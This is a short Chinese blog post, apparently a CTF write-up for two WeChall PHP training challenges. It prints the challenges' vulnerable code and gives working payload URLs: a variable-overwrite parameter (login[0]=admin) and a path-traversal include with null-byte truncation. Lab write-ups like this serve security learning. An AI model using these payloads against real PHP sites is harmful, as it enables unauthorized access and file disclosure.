微笑小站 微笑小站
首页 CTF WeChall PHP Writeup

WeChall PHP Writeup

微笑 4年前

点击标题去往相应的题目链接。

Training: Register Globals

观察源码,发现存在变量覆盖漏洞。

# EMULATE REGISTER GLOBALS = ON
foreach ($_GET as $k => $v) { $$k = $v; }
if (isset($login))
{
        echo GWF_HTML::message('Register Globals', $chall->lang('msg_welcome_back', array(htmlspecialchars($login[0]), htmlspecialchars($login[1]))));
        if (strtolower($login[0]) === 'admin') {
                $chall->onChallengeSolved(GWF_Session::getUserID());
        }
}

因此,传入 login[0]=admin 即可。
https://www.wechall.net/challenge/training/php/globals/globals.php?login[0]=admin

Training: PHP LFI

There is a lot of important stuff in ../solution.php, so please include and execute this file for us.

$code = '$filename = \'pages/\'.(isset($_GET["file"])?$_GET["file"]:"welcome").\'.html\';';
$code_emulate_pnb = '$filename = Common::substrUntil($filename, "\\0");'; # Emulate Poison Null Byte for PHP>=5.3.4
$code2 = 'include $filename;';

...
eval($code.$code_emulate_pnb); # eval the first line
...
if (lfiIsSafeDir($filename) === true) { eval($code2); } # Eval the second line, when safe.
...



它模拟了一个 \0 的截止符,为了能包含 solution.php ,可以利用 00 截断来 bypass 附加的 .html。
payload:https://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00

0
微笑
用自己的眼睛去读世间这一部书。

评论 (0)

返回
    发表评论

猜你喜欢

  • 与CTF有关的一些网站
  • CTF中常见PHP漏洞的利用
  • 安恒 | 工具 - CaptfEncoder
21 2月, 2019

当我建站时,我干些什么

相关文章

Linux 下 ShadowsocksR 服务端的配置
4年前
CTF中常见PHP漏洞的利用
4年前
安恒 | 工具 - CaptfEncoder
4年前
微笑
10
文章
3
评论
12
获赞
Copyright © 2019-2023 微笑小站. Designed by nicetheme.